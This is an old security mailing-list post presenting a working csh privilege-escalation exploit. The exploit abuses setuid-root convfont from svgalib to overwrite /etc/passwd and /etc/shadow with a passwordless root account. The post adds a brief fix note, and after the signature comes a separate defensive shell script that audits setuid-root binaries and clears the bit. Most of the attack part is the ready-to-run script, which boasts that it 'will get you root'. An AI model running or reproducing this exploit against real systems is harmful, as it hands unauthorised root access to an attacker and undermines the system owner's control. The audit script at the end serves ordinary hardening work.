Gday. This is a small exploit written in csh that uses the bug in convfont where it runs as uid 0. convfont loads in a file and reorders it to form a fontfile. It is possible to specify the output file of the program. This script creates new password (and shadow if necessary) files, giving the root user no password.

It has been tested on Slackware 2.0 and Slackware 3.0 setups.

If there are any problems then:
1) Check to see if convfont is installed (part of the svgalib)
2) Check it is setuid root
3) Make sure it *is* a Linux system :)

To Fix:
It is recommended that you remove the setuid bit on convfont, and look closely at all the programs supplied with svgalib. The others have uid 0 holes as well.

Further Details:
Any problems, discussions etc email me.

Squidge

[Here follows the script]

#!/bin/csh
echo "convfont exploit - by Squidge"
echo "squidge@onyx.infonexus.com"
echo " "
echo "this will get you root by exploiting a hole in /usr/bin/convfont"
#NOTE: If this auto-detect screws up, alter the variable PW_TYPE
# PW_TYPE = "plain" is for a normal /etc/passwd
# PW_TYPE = "shadow" is for a shadow /etc/passwd /etc/shadow combo
setenv PATH .:/bin:/usr/bin:/sbin:/usr/sbin
echo " "
echo "determining system type"
if ( -e /etc/shadow ) then
# aha ! is a shadow system
echo "found a shadow password system. good job we're ueberhackers :)"
set PW_TYPE = shadow
else
echo "found a normal password system. make some effort, mr root !"
set PW_TYPE = plain
endif
set loop = 0
set limit = 100
echo > /tmp/passwd root::0:0:Squidge is an Ueberhacker:/:/bin/sh
if ( $PW_TYPE == "shadow" ) then
echo > /tmp/shadow root::9566:0:99999:14:::
endif
echo "building passwd entry. please wait."
while ( $loop < $limit )
@ loop++
echo >> /tmp/passwd " "
echo >> /tmp/shadow " "
echo -n .
end
echo " "
echo "installing fake passwds"
echo "backing up /etc/passwd to /tmp"
cp /etc/passwd /tmp/real.passwd
if ( $PW_TYPE == "shadow" ) then
echo "unable to backup /etc/shadow tho, as it is mode 600"
endif
convfont /tmp/passwd 32 /etc/passwd > /dev/null
convfont /tmp/shadow 32 /etc/shadow > /dev/null
if ( $status != 0 ) then
echo "\!\!\! warning. Something dodgy occured. It could be:"
echo "  convfont isn't installed"
echo "  convfont isn't setuid root"
exit
endif
echo "now return to a login prompt, and type root. you don't need a password"
echo "be sensible, and remember: squidge - The Guild"
echo "  *******************"
rm -f /tmp/passwd /tmp/shadow

And he feebly wiggled his curly tail.

Squidge -- member *the Guild
trmatthe@comp.brad.ac.uk
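The fix the post recommends is removing the setuid bit from convfont and auditing the rest of the svgalib utilities for the same thing. The following POSIX sh script is an added, defender-side example and is not part of Squidge's post or of svgalib: it reports every setuid binary owned by a given uid (root by default) in a directory, can check a single file such as /usr/bin/convfont (the path named in the post), and clears the bit only when the hypothetical FIX=1 environment variable is set. It assumes only `ls -ln`, `awk` and `chmod`, since `stat` flags differ between GNU and BSD.

```shell
#!/bin/sh
# Added example, not from the original post: audit a directory (or one file)
# for setuid binaries owned by a given uid and optionally clear the bit.
# Usage: [FIX=1] ./suid-audit.sh /usr/bin            (defaults to uid 0)
#        [FIX=1] ./suid-audit.sh /usr/bin/convfont

# has_setuid FILE -> true if FILE is a regular file with the setuid bit set
has_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# owner_uid FILE -> prints the numeric owner uid (ls -ln is portable; stat is not)
owner_uid() {
    ls -ln "$1" | awk '{print $3}'
}

# is_setuid_owned_by FILE UID -> true if FILE is setuid and owned by UID
is_setuid_owned_by() {
    has_setuid "$1" && [ "$(owner_uid "$1")" = "$2" ]
}

# drop_setuid FILE -> clear the setuid bit (the remediation the post recommends)
drop_setuid() {
    chmod u-s "$1"
}

# audit_dir DIR [UID] -> prints each setuid file in DIR owned by UID (default 0),
# non-recursive. Returns 0 if nothing was found, 1 if at least one file was.
# With FIX=1 in the environment, the bit is cleared on every file reported.
audit_dir() {
    dir="$1"
    uid="${2:-0}"
    found=0
    for f in "$dir"/*; do
        [ -e "$f" ] || continue
        if is_setuid_owned_by "$f" "$uid"; then
            printf 'setuid (uid %s): %s\n' "$uid" "$f"
            found=1
            if [ "${FIX:-0}" = "1" ]; then
                drop_setuid "$f" && printf '  cleared setuid bit on %s\n' "$f"
            fi
        fi
    done
    return $found
}

# audit_file FILE [UID] -> same contract as audit_dir for a single path;
# a missing file is reported and treated as "nothing found".
audit_file() {
    uid="${2:-0}"
    if [ ! -e "$1" ]; then
        printf 'not installed: %s\n' "$1"
        return 0
    fi
    if is_setuid_owned_by "$1" "$uid"; then
        printf 'setuid (uid %s): %s\n' "$uid" "$1"
        [ "${FIX:-0}" = "1" ] && drop_setuid "$1"
        return 1
    fi
    printf 'ok (not setuid for uid %s): %s\n' "$uid" "$1"
    return 0
}

# Entry point: only runs when a path argument is given, so the functions can
# also be sourced by other scripts.
main() {
    if [ -d "$1" ]; then
        audit_dir "$1" "${2:-0}"
    else
        audit_file "$1" "${2:-0}"
    fi
}

if [ $# -gt 0 ]; then
    main "$@"
fi
```

Run it as root for a complete picture of /usr/bin; as an unprivileged user it still reads modes and ownership, it just cannot clear bits it does not own. The uid argument exists so the same functions can be exercised against files you own before pointing them at the system directories.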